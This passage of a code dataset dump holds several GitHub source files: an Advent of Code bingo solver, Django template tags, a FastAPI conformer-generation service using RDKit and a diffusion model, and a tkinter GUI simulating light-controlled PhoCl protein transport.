__init__(self, size, initial_state=None):\n\t\tself.size = size\n\t\tif initial_state is None:\n\t\t\tinitial_state = np.zeros([size, size])\n\t\tself.board = initial_state\n\t\tself.marked = np.zeros([size, size])\n\n\tdef __str__(self):\n\t\tret = []\n\t\tfor i in range(self.size):\n\t\t\tfor j in range(self.size):\n\t\t\t\tif self.marked[i,j]:\n\t\t\t\t\tret.append(\" *%2i* \" % self.board[i,j])\n\t\t\t\telse:\n\t\t\t\t\tret.append(\" %2i \" % self.board[i,j])\n\n\t\t\tret.append(\"\\n\")\n\t\treturn \"\".join(ret)\n\n\tdef checkNumber(self, num):\n\t\t# Check if number is on board; np.where returns empty arrays when it is absent\n\t\tloc = np.where(self.board[:,:] == num)\n\t\tif loc[0].size:\n\t\t\t# Mark number on board\n\t\t\tself.marked[loc[0][0], loc[1][0]] = 1\n\n\tdef checkWin(self):\n\t\t# If there is a winning row, return True and [i,-1] where i is the index of the winning row.\n\t\t# If there is a winning col, return True and [-1,i] where i is the index of 
the winning col.\n\n\t\tfor i in range(self.size):\n\t\t\t# If a full row or column is marked, the product of its marks is 1.\n\t\t\tr = np.prod(self.marked[i,:])\n\t\t\tc = np.prod(self.marked[:,i])\n\t\t\tif r:\n\t\t\t\treturn True, [i,-1]\n\t\t\tif c:\n\t\t\t\treturn True, [-1,i]\n\n\t\treturn False, [-1,-1]\n\n\tdef computeScore(self, num):\n\t\tunmarked = self.board[self.marked == 0]\n\t\tscore = num*np.sum(unmarked)\n\t\treturn score\n\n\tdef getBoard(self):\n\t\treturn self.board\n\n\tdef getMarked(self):\n\t\treturn self.marked\n\n\nif __name__ == \"__main__\":\n\n\t# Change this to match name of input file with data\n\tFILENAME = 'input.txt'\n\n\t# Current Directory\n\tpwd = os.getcwd()\n\n\t# Check if input file exists in base folder\n\tif FILENAME in os.listdir(pwd):\n\n\t\t# Get each line of data\n\t\twith open(FILENAME, 'r') as infile:\n\t\t\tdata = infile.readlines()\n\n\t\t# Clean data\n\t\tdata = [elem.rstrip() for elem in data]\n\n\t\tnumbers = [int(elem) for elem in data[0].split(',')]\n\t\tboards = [line.strip().split() for line in data[1:] if line ] # Filter out empty lines\n\t\tboard_size = len(boards[1])\n\t\tnum_boards = len(boards)//board_size\n\n\t\tbingo_boards = []\n\n\t\t# Extract initial state of all boards and initialize BingoBoards for each\n\t\tfor idx in range(num_boards):\n\t\t\t# Get initial state of the board\n\t\t\tinitial_state = np.asarray([boards[idx*board_size+j] for j in range(board_size)], dtype=int)\n\n\t\t\t# Create BingoBoard object with initial state\n\t\t\tbboard = BingoBoard(board_size, initial_state)\n\t\t\tbingo_boards.append(bboard)\n\n\n\t\t### PART 1 ###\n\n\t\t# winning_board = None\n\t\t# winning_score = 0\n\t\t# finished = False\n\n\t\t# for num in numbers:\n\t\t# \tfor bingo_board in bingo_boards:\n\t\t# \t\tbingo_board.checkNumber(num)\n\t\t# \t\twon, idx = bingo_board.checkWin()\n\t\t# \t\tif won:\n\t\t# \t\t\tscore = bingo_board.computeScore(num)\n\t\t# \t\t\tif score > winning_score:\n\t\t# \t\t\t\twinning_score = score \n\t\t# \t\t\t\twinning_board = bingo_board\n\t\t# \t\t\tbingo_boards.remove(bingo_board)\n\t\t# \t\t\tfinished = True\n\t\t\t\n\t\t# \tif finished:\n\t\t# \t\tbreak\n\n\n\t\t#print(winning_score)\n\t\t#print(winning_board)\n\n\n\t\t### PART 2 ###\n\t\tfinished = False\n\t\twinning_boards = []\n\n\t\tfor num_idx,num in enumerate(numbers):\n\t\t\tfor idx in range(len(bingo_boards)):\n\t\t\t\tbingo_board = bingo_boards[idx]\n\t\t\t\tif bingo_board:\n\t\t\t\t\tbingo_board.checkNumber(num)\n\t\t\t\t\twon, _ = bingo_board.checkWin()\n\t\t\t\t\tif won:\n\t\t\t\t\t\twinning_boards.append([bingo_board, bingo_board.computeScore(num), num])\n\t\t\t\t\t\tlength = sum([True for a in bingo_boards if a])\n\t\t\t\t\t\tbingo_boards[idx] = False\n\t\t\t\t\t\tif length == 1:\n\t\t\t\t\t\t\tfinished = True\n\t\t\tif finished:\n\t\t\t\tbreak\n\t\t\t\t\t\t\n\n\t\tlosing_board, losing_score, _ = winning_boards[-1]\n\t\tprint(\"\\nSCORE: %i\" % losing_score)\n\t\tprint(losing_board)\n\n\n\n\telse:\n\t\traise AssertionError(\"%s not found in %s\" % (FILENAME, pwd))","repo_name":"Fquico1999/advent_of_code_2021","sub_path":"day_4/day_4.py","file_name":"day_4.py","file_ext":"py","file_size_in_byte":3690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"12877334765","text":"import math\n\nfrom django import template\nfrom django.conf import settings\nfrom django.utils.formats import get_format\nfrom django.utils.translation import get_language\n\nfrom 
..helpers import chunks as chunks_helper, in_group_plain\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef settings_value(name):\n return getattr(settings, name, \"\")\n\n\n@register.simple_tag\ndef settings_format(name):\n lang = get_language()\n return get_format(name, lang, use_l10n=settings.USE_L10N)\n\n\n@register.simple_tag\ndef format_get_values(request, name, key):\n GET = request.GET.copy()\n key = str(key)\n value = GET.get(name, None)\n\n if value is not None and key in value:\n value = ','.join(filter(lambda v: key != v, value.split(',')))\n else:\n value = value.split(',') if value else []\n value = ','.join(value + [key])\n\n if value:\n GET[name] = value\n else:\n GET.pop(name, None)\n params = GET.urlencode()\n\n return '{}?{}'.format(request.path, params)\n\n\n@register.simple_tag\ndef request_path_replace(request, key, value=None):\n GET = request.GET.copy()\n if value:\n GET[key] = value\n else:\n GET.pop(key, None)\n GET.pop('page', None)\n params = GET.urlencode()\n return '{}?{}'.format(request.path, params)\n\n\n@register.filter\ndef split(string, separator):\n return string.split(separator)\n\n\n@register.filter\ndef substract(md, sd):\n return md - sd\n\n\n@register.filter\ndef get(item, key):\n return item.get(key, None)\n\n\n@register.filter\ndef in_group(user, group):\n return in_group_plain(user, group)\n\n\n@register.filter\ndef chunks(l, m):\n if l is None:\n return l\n return chunks_helper(l, m)\n\n\n@register.filter\ndef chunks_by(l, m):\n if l is None:\n return l\n if len(l) < 6:\n return [l]\n return chunks_helper(l, math.ceil(len(l) / m))\n","repo_name":"mtrgroup/django-mtr-utils","sub_path":"mtr/utils/templatetags/mtr_utils.py","file_name":"mtr_utils.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16510203928","text":"# Standard library imports\nfrom argparse import ArgumentParser\nfrom typing import Dict, List, Union, Optional\n\n# Third-party imports\nimport torch\nimport uvicorn\nimport yaml\nfrom fastapi import FastAPI, HTTPException\nfrom pydantic import BaseModel\nfrom rdkit.Chem import Mol, AllChem, MolToMolBlock\n\n# Local application/library specific imports\nfrom diffusion.likelihood import populate_likelihood\nfrom diffusion.sampling import get_seed, embed_seeds, perturb_seeds, pyg_to_mol, sample\nfrom utils.utils import get_model\n\n\n# If your conformer generation logic is in a different module, import it here\n# from your_script_name import generate_conformers\n\napp = FastAPI()\n\nclass ConformerRequest(BaseModel):\n smiles: list[str]\n energy_calculation: str = \"xtb\" # 'xtb' or 'mmff'\n num_conformers: int = 10\n\n\nparser = ArgumentParser()\nargs = parser.parse_args()\nwith open(f'workdir/drugs_default/model_parameters.yml') as f:\n args.__dict__.update(yaml.full_load(f))\n\n\nmodel = get_model(args)\nstate_dict = torch.load(f'workdir/drugs_default/best_model.pt', map_location=torch.device('cpu'))\nargs.xtb = \"/home/loschen/calc/xtb-6.6.1/bin/xtb\"\nmodel.load_state_dict(state_dict, strict=True)\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nmodel = model.to(device)\nmodel.eval()\n\n\n@app.post(\"/generate_conformers/\")\nasync def generate_conformers_endpoints(request: ConformerRequest):\n if request.energy_calculation not in ['xtb', 'mmff']:\n raise HTTPException(status_code=400, detail=\"Energy calculation method must be 'xtb' or 'mmff'\")\n\n result = 
generate_conformers(request.smiles, request.energy_calculation, request.num_conformers)\n print(result)\n return {\"message\": \"Conformer generation completed\", \"result\": result}\n\n\n\n\ndef embed_func(mol: Mol, numConfs: int, numThreads = 4) -> Mol:\n \"\"\"\n Embed multiple conformations for a given molecule.\n\n This function uses RDKit's EmbedMultipleConfs method to generate multiple\n conformations for a given RDKit molecule object.\n\n Args:\n - mol (Mol): An RDKit molecule object.\n - numConfs (int): The number of conformations to generate.\n - numThreads (int): The number of threads.\n\n Returns:\n - Mol: The RDKit molecule object with embedded conformations.\n \"\"\"\n AllChem.EmbedMultipleConfs(mol, numConfs=numConfs, numThreads=numThreads)\n return mol\n\n\ndef generate_conformers(smiles_list: List[str], energy_type: str, num_conformers: int = 10, return_sdf: bool = True) -> Dict[str, Union[List[str], List[Mol]]]:\n \"\"\"\n Generate conformers for a list of SMILES strings.\n\n This function generates conformers for each SMILES string in the given list.\n It supports energy calculation using either 'xtb' or 'mmff' methods. The function\n can return either a list of RDKit molecule objects or their SDF string representations.\n\n Args:\n - smiles_list (List[str]): A list of SMILES strings representing the molecules.\n - energy_type (str): The type of energy calculation to perform ('xtb' or 'mmff').\n - num_conformers (int, optional): The number of conformers to generate for each molecule. Defaults to 10.\n - return_sdf (bool, optional): Whether to return SDF strings instead of RDKit molecule objects. Defaults to True.\n\n Returns:\n - Dict[str, Union[List[str], List[Mol]]]: A dictionary with SMILES as keys and either a list of SDF strings\n or a list of RDKit molecule objects as values, depending on the 'return_sdf' argument.\n \"\"\"\n # Energy calculations based on the specified type\n if energy_type == 'xtb':\n energy_type = \"/home/loschen/calc/xtb-6.6.1/bin/xtb\"\n \n results = {}\n for smi in smiles_list:\n mols = sample_confs(smi, num_conformers, energy_type)\n if not mols:\n continue\n\n # Store the results\n conformer_dict = {}\n conformer_dict[\"SMILES\"] = AllChem.MolToSmiles(mols[0])\n conformer_dict[\"inchikeys\"] = AllChem.MolToInchiKey(mols[0])\n #conformer_dict[\"conformers\"] = mols\n energies = [m.xtb_energy for m in mols]\n \n mols_with_energy = list(zip(mols, energies))\n sorted_mols_with_energy = sorted(mols_with_energy, key=lambda x: x[1])\n sorted_mols, sorted_energies = zip(*sorted_mols_with_energy)\n conformer_dict[\"energies\"] = sorted_energies\n \n sdf_strings = []\n for mol in sorted_mols:\n sdf_string = MolToMolBlock(mol)\n sdf_strings.append(sdf_string)\n conformer_dict[\"SDF\"] = sdf_strings\n \n results[smi] = conformer_dict\n \n return results\n\n\ndef sample_confs(smi: str, n_confs: int, energy_type: str) -> Optional[List[Mol]]:\n \"\"\"\n Generate conformers for a given SMILES string.\n\n This function generates conformers for a molecule represented by a SMILES string.\n It involves several steps including seed generation, embedding of seeds, optional\n perturbation, and sampling of conformers. 
The energy calculation can be done using \n either 'mmff' or 'xtb', determined by the 'energy_type' parameter.\n\n Args:\n - smi (str): The SMILES string representing the molecule.\n - n_confs (int): The number of conformers to generate.\n - energy_type (str): The type of energy calculation to perform ('xtb' or 'mmff').\n\n Returns:\n - Optional[List[Mol]]: A list of RDKit molecule objects with generated conformers.\n Returns None if the seed generation or embedding fails.\n \"\"\"\n mol, data = get_seed(smi, dataset=args.dataset)\n if not mol:\n print('Failed to get seed', smi)\n return None\n\n n_rotable_bonds = int(data.edge_mask.sum())\n\n conformers, pdb = embed_seeds(mol, data, n_confs, single_conf=False,\n pdb=False, embed_func=embed_func, mmff=False)\n if not conformers:\n print(\"Failed to embed\", smi)\n return None\n\n if n_rotable_bonds > 0.5:\n conformers = perturb_seeds(conformers, pdb)\n\n if n_rotable_bonds > 0.5:\n conformers = sample(conformers, model, args.sigma_max, args.sigma_min, n_confs,\n args.batch_size, False, None, pdb, mol=mol)\n\n mols = [pyg_to_mol(mol, conf, (energy_type == \"mmff\"), rmsd=True) for conf in conformers]\n\n for mol, data in zip(mols, conformers):\n populate_likelihood(mol, data, water=True, xtb=energy_type)\n\n if \"xtb\" in energy_type:\n mols = [mol for mol in mols if mol.xtb_energy]\n return mols\n\n\nif __name__ == \"__main__\":\n uvicorn.run(app, host=\"0.0.0.0\", port=8090)\n #result = generate_conformers([\"CCCCO\",\"CCCCNCC\"],\"/home/loschen/calc/xtb-6.6.1/bin/xtb\",10)\n #print(result)\n ","repo_name":"chrissly31415/torsional_diffusion","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23643865954","text":"\"\"\"\n-list all rate constants for creation, degradation, transport, etc.\n\n-list all initial concentrations\n\n-this must be done for both lER and mER systems\n\n-put in a light administration regimen (matrix?)\n======\n\nfor loop to step through all compartment equations (ER, cis Golgi, trans Golgi, membrane/cell external)\n\nthe PhoCl matrix should have function that can switch protein from membrane to lumen, etc. 
based on PhoCl transfer function \"\"\"\n\n#PACKAGES\nfrom __future__ import annotations\nimport webbrowser\nfrom openpyxl import load_workbook\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_tkagg import (\n    FigureCanvasTkAgg, NavigationToolbar2Tk)\nimport math\nimport numpy as np\nfrom tkinter import *\nfrom tkinter import ttk\nimport tkinter.messagebox\nfrom tkinter.tix import * #used for the indicator window\nfrom tkinter import filedialog as fd\nfrom tkinter.messagebox import showinfo\nfrom PIL import ImageTk, Image, ImageDraw\nfrom scipy import integrate #use solve_ivp()\nfrom tkinter.font import Font, nametofont\nimport platform\n\n# CONSTANTS\n\n# Determine platform\nSYSTEM = platform.system().lower()\n\n# Font sizes\nif SYSTEM == \"linux\":\n    REG_FONT_SIZE = 8\n    HEADER_FONT_SIZE = 10\nelse:\n    REG_FONT_SIZE = 20\n    HEADER_FONT_SIZE = 20\n\n# Fonts\nDEF_REG_FONT = \"lucida\"\nHEADER_FONT = \"lucida\"\n\n# Window size\nWX = 2400\nWY = 1400\n\n# Other sizes\nSLIDER_ENTRY_WIDTH = 6\nSLIDER_LABEL_WIDTH = 15\n\n# Website\nWEBSITE_ROOT = \"https://google.com/\"\nEQUATIONS_PAGE = \"\"\n\n# Default values\ndef_k_prod: float = 0\ndef_k_cell_to_plasma: float = 0\ndef_k_plasma_to_cell: float = 0 \ndef_k_lumen_to_out: float = 0 \ndef_k_out_to_lumen: float = 0 \ndef_c_cell: float = 0\ndef_c_plasma: float = 0\ndef_k_degradation: float = 0\nC_CELL0: float = 0\nC_PLASMA0: float = 0\nC_LUMEN0: float = 0\nC_OUT0: float = 0\n\n#FIRST, DEFINE ALL FUNCTIONS FOR ALL ORGANELLES FOR THE SOLVE_IVP CODE\n#stand-in function for now:\ndef f_shed(t, y, k_prod, k_cell_to_plasma, k_plasma_to_cell, k_lumen_to_out, k_out_to_lumen, c_cell, c_plasma, k_deg, light_regimen: list[tuple[str, float]]):\n    #concentrations of proteins in various compartments\n    mem_conc = y[0]\n    plasma_conc = y[1]\n    lumen_conc = y[2]\n    out_conc = y[3]\n\n    #light regimen indicator function\n    chi = 0\n    if t == 0:\n        chi = 1\n    else:\n        for i in range(len(light_regimen)):\n            if light_regimen[i][1] > t:\n                if light_regimen[i-1][0] == \"on\":\n                    chi = 1\n                break\n\n    #final derivative equations for the concentrations\n    d_cell = k_prod + k_plasma_to_cell*plasma_conc - k_cell_to_plasma*mem_conc - chi*c_cell*mem_conc\n    d_plasma = k_cell_to_plasma*mem_conc - k_plasma_to_cell*plasma_conc - chi*c_plasma*plasma_conc\n    d_lumen = k_out_to_lumen*out_conc - k_lumen_to_out*lumen_conc + chi*c_cell*mem_conc\n    d_out = k_lumen_to_out*lumen_conc - k_out_to_lumen*out_conc + chi*c_plasma*plasma_conc\n\n    out = np.array([d_cell, d_plasma, d_lumen, d_out])\n    #first-order degradation removes protein from every compartment, so it is subtracted\n    out -= np.array([mem_conc, plasma_conc, lumen_conc, out_conc])*k_deg\n    \n    return out\n    #https://www.youtube.com/watch?v=Gg--FOdupwY super helpful video to set up the final form of the function :)\n    \n\ndef rmseCalc(te, y_actual, ts, y_predicted):\n    # Do a linear interpolation of predicted data to check against experimental data\n    n = len(te)\n    ns = len(ts)\n    if n != len(y_actual):\n        raise ValueError(\"Something wrong with experimental data in RMSE\")\n\n    if ns != len(y_predicted):\n        raise ValueError(\"Something wrong with simulated data in RMSE\")\n\n    sidx = 0\n    mse = 0\n    for i in range(n):\n        t = te[i]\n        for j in range(sidx, ns):\n            if ts[j] > t:\n                sidx = j\n                break\n        \n        # Linear interpolation\n        t0 = ts[sidx-1]\n        t1 = ts[sidx]\n        y0 = y_predicted[sidx-1]\n        y1 = y_predicted[sidx]\n        y = (y0*(t1 - t) + y1*(t - t0))/(t1 - t0)\n        \n        mse += (y_actual[i] - y)**2\n    \n    mse /= n\n    return math.sqrt(mse)\n\nclass VarSlider(Frame):\n    inputWindow: InputWindow\n\n    def __init__(self, win, 
inputWindow: InputWindow, length: int, bg: str, label: str, callback=lambda x: None, from_def: float=0, to_def: float=100):\n super().__init__(win, bg=bg)\n self.inputWindow = inputWindow\n self.callback = callback\n\n self.label = Label(self, text=label + \":\", bg=bg, width=SLIDER_LABEL_WIDTH)\n self.from_input = Entry(self, width=SLIDER_ENTRY_WIDTH)\n self.from_input.insert(0, str(from_def))\n self.slider = Scale(self, length=length, bg=bg, orient=HORIZONTAL, command=self.handle_callback)\n self.to_input = Entry(self, width=SLIDER_ENTRY_WIDTH)\n self.to_input.insert(0, str(to_def))\n\n # self.columnconfigure(0, weight=20)\n # self.columnconfigure(1, weight=1)\n # self.columnconfigure(2, weight=2)\n # self.columnconfigure(3, weight=1)\n\n self.label.grid(column=0, row=0)\n self.from_input.grid(column=1, row=0, sticky=\"e\")\n self.slider.grid(column=2, row=0)\n self.to_input.grid(column=3, row=0, sticky=\"w\")\n \n def disable(self):\n self.slider['state'] = 'disabled'\n self.from_input['state'] = 'disabled'\n self.to_input['state'] = 'disabled'\n \n def enable(self):\n self.slider['state'] = 'normal'\n self.to_input['state'] = 'normal'\n self.from_input['state'] = 'normal'\n \n def handle_callback(self, value):\n self.slider[\"from\"] = self.from_input.get()\n self.slider[\"to\"] = self.to_input.get()\n self.callback(value)\n \n def get(self):\n return self.slider.get()\n\nclass InputWindow:\n var_sliders: list[VarSlider]\n rates: dict[str, float]\n\n def __init__(self, win):\n # Instantiate rates\n self.rates = {\"k_prod\": def_k_prod,\n \"k_cell_to_plasma\": def_k_cell_to_plasma,\n \"k_plasma_to_cell\": def_k_plasma_to_cell,\n \"k_lumen_to_out\": def_k_lumen_to_out,\n \"k_out_to_lumen\": def_k_out_to_lumen,\n \"c_cell\": def_c_cell,\n \"c_plasma\": def_c_plasma,\n \"k_degradation\": def_k_degradation}\n \n # Create objects of tkinter ImageTk for use in GUI\n # Load the image\n #info_img=Image.open(\"./assets/info_img.jpg\")\n #info_img = info_img.resize((20, 20))\n #info_img=ImageTk.PhotoImage(info_img)\n # Parameters\n #self.font = Font(size=12)\n \n\n\n #LIGHT FRAME \n m = 0 #row index for the light frame\n #define the subframe\n light_frame = Frame(win)\n #define labels, text entries, buttons\n light_title=Label(light_frame, text = 'Light Administration Regimen ', font = f'{HEADER_FONT} {HEADER_FONT_SIZE} bold')\n lbl1=Label(light_frame, text='Time on (min, sec):')\n lbl2=Label(light_frame, text='Time off (min, sec):')\n lbl3=Label(light_frame, text='# Cycles:')\n lbl4=Label(light_frame, text = 'Time after last cycle (min, sec):')\n self.t1=Entry(light_frame, bd=7)\n self.t1.insert(0, \"0,0\")\n self.t2=Entry(light_frame, bd=7)\n self.t2.insert(0, \"0,0\")\n self.t3=Entry(light_frame, bd=7)\n self.t3.insert(0, \"1\")\n self.t4=Entry(light_frame, bd=7)\n self.t4.insert(0, \"0,0\")\n #Place all elements in subframe\n light_title.grid(row = m, column = 0, columnspan = 2, ipady = 20)\n m =+ 1\n lbl1.grid(row = m, column = 0)\n self.t1.grid(row = m, column = 1, padx=20)\n m += 1\n lbl2.grid(row = m, column = 0)\n self.t2.grid(row = m, column = 1)\n m += 1\n lbl3.grid(row = m, column = 0)\n self.t3.grid(row = m, column = 1)\n m += 1\n lbl4.grid(row = m, column = 0)\n self.t4.grid(row = m, column = 1)\n b2=Button(light_frame, bd=7, text='Reset', command = self.reset, cursor = 'hand2')\n m += 1\n b2.grid(row = m, column = 0, pady = 20, columnspan=2)\n light_frame.grid(row = 0, column = 0)\n Grid.columnconfigure(light_frame, 0, weight=1)\n Grid.columnconfigure(light_frame, 1, weight=1)\n # 
Create a Label Widget to display helpful tip - TODO\n # light_info = Label(light_frame, image = info_img)\n # light_info.image = info_img #keep a reference apparently??? ASK SAM\n # light_info.grid(row = 0, column = 1)\n #info text \n # light_tip=Balloon(win)\n # light_tip.bind_widget(light_info, balloonmsg=\"Python is an interpreted, high-level and general-purpose programming language \\n when does it switch to next line\") #use \\n to get to the next line\n \n\n \n #SELECT EXPERIMENTAL DATA\n experiment_frame = Frame(win)\n exp_title=Label(experiment_frame, text = 'Experimental Data (Excel Sheet)', font = f'{HEADER_FONT} {HEADER_FONT_SIZE} bold')\n exp_title.grid(row = 0, column = 0, columnspan = 2)\n bexp=Button(experiment_frame, bd = 7, text='Import Data', command=self.import_data, cursor = 'hand2')\n bexp.grid(row = 1, column = 0, columnspan = 2, pady= 20)\n experiment_frame.grid(row = 1, column = 0, pady = 20)\n #Grid.columnconfigure(experiment_frame, 0, weight=1)\n #Grid.columnconfigure(experiment_frame, 1, weight=1)\n\n\n #CONSTRUCT SELECTION\n construct_frame = Frame(win)\n #title the subframe\n con_title = Label(construct_frame, text = 'Select PhoCl Construct', font = f'{HEADER_FONT} {HEADER_FONT_SIZE} bold')\n con_title.grid(row = 0, column = 0, columnspan = 3)\n #define construct options\n var = IntVar()\n R_secrete = Radiobutton(construct_frame, text=\"PhoCl Secrete\", variable=var, value=1, command=lambda: self.update_sliders_frame(\"secrete\"))\n R_shed = Radiobutton(construct_frame, text=\"PhoCl Shed\", variable=var, value=2, command=lambda: self.update_sliders_frame(\"shed\"))\n R_disp = Radiobutton(construct_frame, text=\"PhoCl display\", variable=var, value=3, command=lambda: self.update_sliders_frame(\"display\"))\n #place construct options in frame\n R_secrete.grid(row = 1, column = 0, sticky = 'w')\n R_shed.grid(row = 1, column = 1, sticky = 'w')\n R_disp.grid(row = 1, column = 2, sticky = 'w')\n #place subframe in main window\n construct_frame.grid(row = 2, column = 0, pady = 20)\n \n\n\n #VARIABLE TUNERS\n s_length = 600\n s_color = 'light gray'\n tuner_frame = Frame(win, relief = 'sunken', bd = 10, bg = s_color)\n m = 0 #row index\n #title\n self.tuner_title=Label(tuner_frame, text = 'Rate Constants (PhoCl Secrete)', font = f'{HEADER_FONT} {HEADER_FONT_SIZE} bold', bg = s_color)\n self.tuner_title.grid(row = m, column = 0, columnspan = 2)\n m += 1\n #protein production slider\n self.k_prod_slider = VarSlider(tuner_frame, self, length=s_length, label='k_prod', from_def=0, to_def=100, bg=s_color, callback=lambda x: self.update_rates(\"k_prod\", float(x)))\n self.k_prod_slider.grid(row=m, column = 0, columnspan = 2, sticky=\"ew\")\n m += 1 \n\n self.k_c2p_slider = VarSlider(tuner_frame, self, length=s_length, label='k_mi->mo', from_def=0, to_def=100, bg=s_color, callback=lambda x: self.update_rates(\"k_cell_to_plasma\", float(x)))\n self.k_c2p_slider.grid(row=m, column=0, columnspan=2, sticky=\"ew\")\n m += 1\n\n self.k_p2c_slider = VarSlider(tuner_frame, self, length=s_length, label='k_mo->mi', from_def=0, to_def=100, bg=s_color, callback=lambda x: self.update_rates(\"k_plasma_to_cell\", float(x)))\n self.k_p2c_slider.grid(row=m, column=0, columnspan=2, sticky=\"ew\")\n m += 1\n\n self.k_l2o_slider = VarSlider(tuner_frame, self, length=s_length, label='k_li->lo', from_def=0, to_def=100, bg=s_color, callback=lambda x: self.update_rates(\"k_lumen_to_out\", float(x)))\n self.k_l2o_slider.grid(row=m, column=0, columnspan=2, sticky=\"ew\")\n m += 1\n\n self.k_o2l_slider = 
VarSlider(tuner_frame, self, length=s_length, label='k_lo->li', from_def=0, to_def=100, bg=s_color, callback=lambda x: self.update_rates(\"k_out_to_lumen\", float(x)))\n        self.k_o2l_slider.grid(row=m, column=0, columnspan=2, sticky=\"ew\")\n        m += 1\n\n        self.c_cell_slider = VarSlider(tuner_frame, self, length=s_length, label='L_i', from_def=0, to_def=100, bg=s_color, callback=lambda x: self.update_rates(\"c_cell\", float(x)))\n        self.c_cell_slider.grid(row=m, column=0, columnspan=2, sticky=\"ew\")\n        m += 1\n\n        self.c_plasma_slider = VarSlider(tuner_frame, self, length=s_length, label='L_o', from_def=0, to_def=100, bg=s_color, callback=lambda x: self.update_rates(\"c_plasma\", float(x)))\n        self.c_plasma_slider.grid(row=m, column=0, columnspan=2, sticky=\"ew\")\n        m += 1\n\n        self.k_degrad_slider = VarSlider(tuner_frame, self, length=s_length, label='k_degradation', from_def=0, to_def=100, bg=s_color, callback=lambda x: self.update_rates(\"k_degradation\", float(x)))\n        self.k_degrad_slider.grid(row=m, column=0, columnspan=2, sticky=\"ew\")\n        m += 1\n\n\n        #clickable links\n        # self.scale_range = Label(tuner_frame, text = 'Change range of sliders', fg = 'blue', bg = s_color, font = \"lucida 16 underline\", pady = 10, cursor = 'hand2')\n        # self.scale_range.grid(row = m, column = 0)\n        self.eq_list = Label(tuner_frame, text = 'See construct equations', fg = 'blue', bg = s_color, font = \"lucida 16 underline\", pady = 10, cursor = 'hand2')\n        self.eq_list.grid(row = m, column = 0, columnspan=2)\n        # self.scale_range.bind(\"<Button-1>\", self.onTextClick)\n        self.eq_list.bind(\"<Button-1>\", lambda _: webbrowser.open(f\"{WEBSITE_ROOT}/{EQUATIONS_PAGE}\", new=True))\n        m += 1\n        #final button\n        self.bs=Button(tuner_frame, bd=7, text='Run Simulation', command=self.submit, cursor = 'hand2')\n        self.bs.grid(row = m, column = 0, columnspan = 2, padx = 60, pady = 20, sticky = 'nsew')\n        tuner_frame.grid(row = 3, column = 0, pady = 20)\n\n        # Put sliders into list for ease of use later\n        self.var_sliders = [self.k_prod_slider, self.k_c2p_slider, self.k_degrad_slider, self.k_l2o_slider, self.k_o2l_slider, self.k_p2c_slider, self.c_cell_slider, self.c_plasma_slider]\n\n        # Select correct construct radio button\n        R_shed.select()\n        self.update_sliders_frame(\"shed\")\n\n        #PLOT\n        matplotlib_frame = Frame(win)\n        # Some example data to display\n        self.x_exp = np.linspace(0, 2 * np.pi, 400)\n        self.y_exp = self.x_exp * 0\n        self.x_sim = np.linspace(0, 2 * np.pi, 400)\n        self.y_sim = self.x_sim * 0\n        fig, self.ax = plt.subplots()\n        self.ax.plot(self.x_exp, self.y_exp, label=\"experimental\")\n        self.ax.plot(self.x_sim, self.y_sim, label=\"simulation\")\n        self.ax.set_xlabel('Time', fontsize=16)\n        self.ax.set_ylabel('Concentration/Intensity', fontsize=16)\n        self.ax.legend()\n        self.ax.set_title('Experimental and Simulation Plots', fontsize=20)  \n        self.canvas = FigureCanvasTkAgg(fig, master=matplotlib_frame)  # A tk.DrawingArea.\n        self.canvas.draw()\n        # pack_toolbar=True packs the toolbar into matplotlib_frame for us\n        toolbar = NavigationToolbar2Tk(self.canvas, matplotlib_frame, pack_toolbar=True)\n        toolbar.update()\n        matplotlib_frame.grid(row = 0, column = 1, rowspan = 4, sticky='nsew')\n        #toolbar.pack(side=BOTTOM, fill=X)\n        self.canvas.get_tk_widget().pack(side=TOP, expand=True, fill=\"both\") #fill=BO\n\n\n\n        #RMSE FRAME\n        rmse_frame = Frame(win)\n        self.rmse_label = Label(rmse_frame, text = 'RMSE: ')\n        self.rmse_label.grid(row = 0, column = 0)\n        rmse_frame.grid(row = 5, column = 1, sticky='ew')\n    \n    
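# Note: submit() below passes self.rates positionally into f_shed via solve_ivp's\n    # args, so the insertion order of self.rates must match f_shed's parameter order:\n    # (k_prod, k_cell_to_plasma, k_plasma_to_cell, k_lumen_to_out, k_out_to_lumen, c_cell, c_plasma, k_deg).\n\n    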
#===============================FUNCTIONS===================================================== \n\n    def import_data(self):\n        #delete current experimental values\n        self.x_exp = []\n        self.y_exp = []\n        #ask user to input excel file\n        file_name = fd.askopenfilename(\n            title='Open a file',\n            initialdir='/')\n        showinfo(\n            title='Selected File',\n            message=file_name\n        )\n        workbook = load_workbook(filename=file_name)\n        sheet = workbook.active #assumption that there is only one sheet in a given excel file\n        #take cell values and put into x_exp and y_exp\n        columnA = sheet['A'] # Column\n        self.x_exp = [columnA[i].value for i in range(len(columnA))]\n        columnB = sheet['B'] # Column\n        self.y_exp = [columnB[i].value for i in range(len(columnB))]\n        \n        #clear the plot of old values\n        plt.cla()\n        #replot everything\n        self.ax.set_xlabel('Time', fontsize=16)\n        self.ax.set_ylabel('Concentration/Intensity', fontsize=16)\n        self.ax.plot(self.x_exp, self.y_exp, marker='o', label=\"experimental\")\n        self.ax.plot(self.x_sim, self.y_sim, label=\"simulation\")\n        self.ax.legend()\n        self.ax.set_title('Experimental and Simulation Plots', fontsize=20) \n        self.canvas.draw()\n        #clear RMSE values from display\n        self.rmse_label[\"text\"] = \"RMSE: \"\n        \n\n\n    def submit(self):\n        # STUFF FROM OLD submit FUNCTION\n        dt = 1 #TEMPORARILY\n        #take each text entry to get string\n        onTime = str(self.t1.get())\n        offTime = str(self.t2.get())\n        numCycles = int(self.t3.get())\n        afterTime = str(self.t4.get())\n        #separate minute and sec values\n        onTime = onTime.split(\",\")\n        offTime = offTime.split(\",\")\n        afterTime = afterTime.split(\",\")\n        #convert the str values to int\n        onTime = [int(i) for i in onTime] #would prefer to only use the first 2 values\n        offTime = [int(i) for i in offTime]\n        afterTime = [int(i) for i in afterTime]\n        # Convert to seconds\n        onTime = onTime[0]*60 + onTime[1]\n        offTime = 